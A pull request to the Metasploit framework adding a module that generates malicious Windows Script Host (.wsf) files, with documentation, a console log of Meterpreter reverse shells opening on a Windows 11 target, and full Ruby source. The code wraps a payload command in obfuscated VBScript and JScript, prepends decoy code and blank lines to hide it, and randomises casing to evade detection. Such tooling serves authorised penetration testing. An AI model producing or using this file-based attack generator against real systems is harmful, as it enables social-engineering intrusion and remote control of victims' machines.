### PR TITLE
Add Malicious Windows Script Host Script File (.wsf) module

### DIFF
--- a/documentation/modules/exploit/windows/fileformat/windows_script_host_wsf.md
+++ b/documentation/modules/exploit/windows/fileformat/windows_script_host_wsf.md
@@ -1,0 +1,96 @@
+## Vulnerable Application
+
+This module creates a Windows Script Host (WSH) Windows Script File (.wsf).
+
+This module has been tested successfully on:
+
+* Microsoft Windows 7 Professional SP1 (x86_64)
+* Microsoft Windows 11 Professional 21H2 (x86_64)
+
+
+## Options
+
+### FILENAME
+
+The WSF file name. (Default: `msf.wsf`).
+
+### OBFUSCATE
+
+Enable VBScript/JScript obfuscation. (Default: `true`)
+
+### SCRIPT_LANGUAGE
+
+The WSH script language to use. (default: `all`)
+
+
+## Advanced Options
+
+### PrependBenignCode
+
+Prepend several lines of benign code at the start of the VBScript/JScript. (Default: `true`)
+
+### PrependNewLines
+
+Prepend new lines before the malicious VBScript/JScript. (Default: `100`)
+
+
+## Verification Steps
+
+On the Metasploit host:
+
+1. Start msfconsole
+1. Do: `use exploit/windows/fileformat/windows_script_host_wsf`
+1. Do: `set script_language [language]`
+1. Do: `set filename [filename.wsf]`
+1. Do: `set payload [payload]`
+1. Do: `set lhost [lhost]`
+1. Do: `set lport [lport]`
+1. Do: `run`
+1. Do: `handler -p [payload] -P [lport] -H [lhost]`
+
+On the target Windows machine:
+
+1. Ensure Windows Security is disabled
+1. Ensure Windows Registry `HKCU` and `HKLM` key `SOFTWARE\Microsoft\Windows Script Host\Settings\Enabled` is not present or set to 1
+1. Open the `msf.wsf` file
+1. If prompted to choose a program to open the file, select Windows Script Host
+
+
+## Scenarios
+
+### Microsoft Windows 11 Professional 21H2 (x86_64)
+
+```
+msf > use exploit/windows/fileformat/windows_script_host_wsf
+[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/fileformat/windows_script_host_wsf) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
+payload => cmd/windows/http/x64/meterpreter/reverse_tcp
+msf exploit(windows/fileformat/windows_script_host_wsf) > set lhost 192.168.200.130 
+lhost => 192.168.200.130
+msf exploit(windows/fileformat/windows_script_host_wsf) > set lport 4444
+lport => 4444
+msf exploit(windows/fileformat/windows_script_host_wsf) > set script_language all
+script_language => all
+msf exploit(windows/fileformat/windows_script_host_wsf) > run
+[+] msf.wsf stored at /root/.msf4/local/msf.wsf
+msf exploit(windows/fileformat/windows_script_host_wsf) > handler -p cmd/windows/http/x64/meterpreter/reverse_tcp -P 4444 -H 192.168.200.130
+[*] Payload handler running as background job 0.
+msf exploit(windows/fileformat/windows_script_host_wsf) > 
+[*] Started reverse TCP handler on 192.168.200.130:4444 
+[*] Sending stage (203846 bytes) to 192.168.200.169
+[*] Sending stage (203846 bytes) to 192.168.200.169
+[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.169:50301) at 2025-10-05 05:05:43 -0400
+[*] Meterpreter session 2 opened (192.168.200.130:4444 -> 192.168.200.169:50302) at 2025-10-05 05:05:44 -0400
+
+msf exploit(windows/fileformat/windows_script_host_wsf) > sessions -i -1
+[*] Starting interaction with 2...
+
+meterpreter > sysinfo
+Computer        : WIN-11-PRO-X64
+OS              : Windows 11 21H2 (10.0 Build 22000).
+Architecture    : x64
+System Language : en_GB
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+```

--- a/modules/exploits/windows/fileformat/windows_script_host_wsf.rb
+++ b/modules/exploits/windows/fileformat/windows_script_host_wsf.rb
@@ -1,0 +1,222 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+
+  include Msf::Exploit::FILEFORMAT
+  include Msf::Exploit::JSObfu
+  include Msf::Exploit::VBSObfuscate
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Malicious Windows Script Host Script File (.wsf)',
+        'Description' => %q{
+          This module creates a Windows Script Host (WSH) Windows Script File (.wsf).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'bcoles'
+        ],
+        'References' => [
+          ['ATT&CK', Mitre::Attack::Technique::T1204_002_MALICIOUS_FILE],
+        ],
+        'Arch' => [ARCH_CMD],
+        'Platform' => 'win',
+        'Payload' => {
+          'Space' => 8_000, # 8190 maximum command length, minus some space for "cmd.exe /c " and escaping
+          'BadChars' => "\x00",
+          'DisableNops' => true
+        },
+        'Targets' => [
+          [
+            'Microsoft Windows 98 or newer', {}
+          ],
+        ],
+        'Privileged' => false,
+        'DisclosureDate' => '1998-06-25', # Windows 98 release date
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'DisablePayloadHandler' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [SCREEN_EFFECTS]
+        }
+      )
+    )
+
+    register_options([
+      OptString.new('FILENAME', [true, 'The WSF file name.', 'msf.wsf']),
+      OptEnum.new('SCRIPT_LANGUAGE', [true, 'The WSH script language to use.', 'all', %w[vbscript jscript all]]),
+      OptBool.new('OBFUSCATE', [false, 'Enable VBScript/JScript obfuscation', true])
+    ])
+
+    register_advanced_options([
+      OptBool.new('PrependBenignCode', [false, 'Prepend several lines of benign code at the start of the VBScript/JScript.', true]),
+      OptInt.new('PrependNewLines', [false, 'Prepend new lines before the malicious VBScript/JScript.', 100]),
+    ])
+  end
+
+  # Build a series of benign VBScript noise blocks
+  #
+  # @param [Integer] block_count Number of blocks to generate
+  #
+  # @return [String] block_count blocks of inert VBScript
+  def generate_vbscript_noise(block_count = 0)
+    lines = []
+
+    block_count.times do
+      case rand(4)
+      when 0 # Dummy variable declarations and assignments
+        v1 = rand_text_alpha(6..16)
+        v2 = rand_text_alpha(6..16)
+        a = rand(0..100)
+        b = rand(0..100)
+        lines << "Dim #{v1}, #{v2}"
+        lines << "#{v1} = #{a}"
+        lines << "#{v2} = #{b}"
+      when 1 # Dummy Function
+        fname = rand_text_alpha(6..16)
+        arg = rand_text_alpha(6..16)
+        mult = rand(1..5)
+        lines << "Function #{fname}(#{arg})"
+        lines << "    #{fname} = #{arg} * #{mult}"
+        lines << 'End Function'
+      when 2 # Dummy Sub
+        sname = rand_text_alpha(6..16)
+        arg = rand_text_alpha(6..16)
+        mult = rand(1..5)
+        lines << "Sub #{sname}(#{arg})"
+        lines << "    #{sname} = #{arg} * #{mult}"
+        lines << 'End Sub'
+      when 3 # Dummy For loop
+        idx = rand_text_alpha(6..16)
+        max = rand(1..5)
+        lines << "Dim #{idx}"
+        lines << "For #{idx} = 1 To #{max}"
+        lines << "    #{idx} = #{idx} + 0"
+        lines << 'Next'
+      end
+    end
+
+    lines.join("\r\n")
+  end
+
+  def generate_jscript(command_string, prepend_benign_code: false, prepend_new_lines: 0, obfuscate: false)
+    js = ''
+
+    # TODO: This could be improved by generating more realistic looking
+    # benign code with functions and flow control
+    if prepend_benign_code
+      rand(5..10).times do
+        js << "var #{rand_text_alpha(6..16)}=\"#{rand_text_alphanumeric(6..16)}\";\r\n"
+      end
+    end
+
+    js << "\r\n" * prepend_new_lines
+
+    escaped_payload = command_string.gsub('\\', '\\\\\\').gsub('"', '\\"')
+
+    # If the payload contains " & " we presume it is a command string.
+    #
+    # TODO: Change this once Metasploit is able to inform a module that
+    #       the specified ARCH_CMD payload is a string of commands
+    #       (not a single command).
+    if escaped_payload.include?(' & ')
+      cmd = "cmd.exe /c #{escaped_payload}"
+    else
+      cmd = escaped_payload
+    end
+
+    shell_var = rand_text_alpha(6..16)
+    js_payload = "var #{shell_var} = new ActiveXObject(\"WScript.Shell\");"
+    js_payload << "#{shell_var}.Run(\"#{cmd}\");"
+
+    if obfuscate
+      js_obfu = Rex::Exploitation::JSObfu.new(js_payload)
+      obfuscated_payload = js_obfu.obfuscate(memory_sensitive: false).to_s
+      # WSH JScript execution context does not support 'window' object
+      obfuscated_payload = obfuscated_payload.gsub('window[', 'String[')
+      js << obfuscated_payload
+    else
+      js << js_payload
+    end
+
+    js
+  end
+
+  def generate_vbscript(command_string, prepend_benign_code: false, prepend_new_lines: 0, obfuscate: false)
+    vbs = ''
+    vbs << generate_vbscript_noise(rand(8..10)) if prepend_benign_code
+    vbs << "\r\n" * prepend_new_lines
+
+    escaped_payload = command_string.gsub('\\', '\\\\\\').gsub('"', '\\"')
+
+    # If the payload contains " & " we presume it is a command string.
+    #
+    # TODO: Change this once Metasploit is able to inform a module that
+    #       the specified ARCH_CMD payload is a string of commands
+    #       (not a single command).
+    if escaped_payload.include?(' & ')
+      cmd = "cmd.exe /c #{escaped_payload}"
+    else
+      cmd = escaped_payload
+    end
+
+    shell_obj = 'WScript.Shell'.chars.map { |c| (rand(2) == 0 ? c.downcase : c.upcase) }.join
+    vbs_payload = "CreateObject(\"#{shell_obj}\").Run(\"#{cmd}\")"
+    if obfuscate
+      vbs << vbs_obfuscate(vbs_payload).to_s
+    else
+      vbs << vbs_payload
+    end
+
+    vbs
+  end
+
+  def generate_wsf(vbs: nil, js: nil)
+    job_id = rand_text_alphanumeric(8..12)
+    wsf_content = [
+      "<script language=\"JScript\">\r\n#{js}\r\n</script>",
+      "<script language=\"VBScript\">\r\n#{vbs}\r\n</script>"
+    ].shuffle.join
+
+    "<job id=\"#{job_id}\">#{wsf_content}</job>"
+  end
+
+  def exploit
+    js = nil
+    vbs = nil
+
+    if ['all', 'vbscript'].include?(datastore['SCRIPT_LANGUAGE'].to_s.downcase)
+      vbs = generate_vbscript(
+        payload.encoded,
+        prepend_benign_code: datastore['PrependBenignCode'],
+        prepend_new_lines: datastore['PrependNewLines'],
+        obfuscate: datastore['OBFUSCATE']
+      )
+    end
+
+    if ['all', 'jscript'].include?(datastore['SCRIPT_LANGUAGE'].to_s.downcase)
+      js = generate_jscript(
+        payload.encoded,
+        prepend_benign_code: datastore['PrependBenignCode'],
+        prepend_new_lines: datastore['PrependNewLines'],
+        obfuscate: datastore['OBFUSCATE']
+      )
+    end
+
+    wsf = generate_wsf(
+      js: js,
+      vbs: vbs
+    )
+
+    file_create(wsf)
+  end
+end


### PR DESCRIPTION
This module is effectively a duplicate of both the malicious WSH VBScript module (#20406) and malicious WSH JScript module (#20398)  wrapped in the necessary XML tags for WSF format. The Ruby methods used in this module are identical to the aforementioned modules. It may, in the future, be worthwhile moving these to a new library.

`script_language` defaults to `all` which uses both VBscript and JScript, resulting in two sessions upon successful execution. Although superfluous, this seemed like a more reasonable default than playing favorites with either VBScript/JScript.

This module is unlikely to allow initial access without substantial social engineering efforts (or additional obfuscation), as malicious WSH files will almost certainly be blocked by EDR.
